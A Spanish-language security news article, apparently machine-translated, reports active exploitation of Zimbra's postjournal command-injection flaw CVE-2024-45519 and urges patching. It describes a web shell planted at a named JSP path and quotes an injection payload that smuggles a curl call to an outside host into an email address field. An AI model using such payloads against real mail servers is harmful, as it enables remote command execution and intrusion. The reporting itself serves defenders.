02 de octubre de 2024The Hacker NewsSeguridad del correo electrónico/vulnerabilidad Los investigadores de ciberseguridad advierten sobre intentos de explotación activa dirigidos a una falla de seguridad recientemente revelada en la colaboración Zimbra de Synacor. La empresa de seguridad empresarial Proofpoint dijo que comenzó a observar la actividad a partir del 28 de septiembre de 2024. Los ataques buscan explotar CVE-2024-45519, una falla de seguridad grave en su servicio post-revista que podría permitir a atacantes no autenticados ejecutar comandos arbitrarios en las instalaciones de Zimbra afectadas. «Los correos electrónicos que falsificaban Gmail se enviaron a direcciones falsas en los campos CC en un intento de que los servidores Zimbra los analizaran y ejecutaran como comandos», dijo Proofpoint en una serie de publicaciones en X. «Las direcciones contenían cadenas Base64 que se ejecutan con el utilidad de pescado.» Zimbra solucionó el problema crítico en las versiones 8.8.15 parche 46, 9.0.0 parche 41, 10.0.9 y 10.1.1 lanzadas el 4 de septiembre de 2024. A un investigador de seguridad llamado lebr0nli (Alan Li) se le atribuye el descubrimiento y reportar las deficiencias. «Si bien la función postdiario puede ser opcional o no estar habilitada en la mayoría de los sistemas, aún es necesario aplicar el parche proporcionado para evitar una posible explotación», señaló Ashish Kataria, ingeniero arquitecto de seguridad de Synacor, en un comentario del 19 de septiembre de 2024. «Para los sistemas Zimbra donde la función postdiario no está habilitada y el parche no se puede aplicar inmediatamente, eliminar el binario postdiario podría considerarse como una medida temporal hasta que se pueda aplicar el parche». Proofpoint dijo que identificó una serie de direcciones CC que, cuando se decodifican, intentan escribir un shell web en un servidor Zimbra vulnerable en la ubicación: «/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp». Posteriormente, el shell web instalado escucha la conexión entrante con un campo de cookie JSESSIONID predeterminado y, si está presente, procede a analizar la cookie JACTION para los comandos Base64. El web shell viene equipado con soporte para la ejecución de comandos a través de exec. Alternativamente, también puede descargar y ejecutar un archivo a través de una conexión de socket. Los ataques no se han atribuido a ningún actor o grupo de amenazas conocido al momento de escribir este artículo. Dicho esto, la actividad de explotación parece haber comenzado un día después de que Project Discovery publicara los detalles técnicos de la falla, que decía que «proviene de entradas no saneadas del usuario que se pasan a popen en la versión sin parches, lo que permite a los atacantes inyectar comandos arbitrarios». Para la empresa de ciberseguridad, el problema tiene su origen en la forma en que el binario postjournal basado en C maneja y analiza las direcciones de correo electrónico de los destinatarios en una función llamada «msg_handler()», permitiendo así la inyección de comandos en el servicio que se ejecuta en el puerto 10027 al pasar un mensaje SMTP especialmente diseñado. con una dirección falsa (por ejemplo, «aabbb$(curl${IFS}oast.me)»@mail.domain.com). A la luz de los intentos de explotación activos, se recomienda encarecidamente a los usuarios que apliquen los parches más recientes para una protección óptima contra amenazas potenciales. ¿Encontró interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síganos en Twitter  y LinkedIn para leer más contenido exclusivo que publicamos.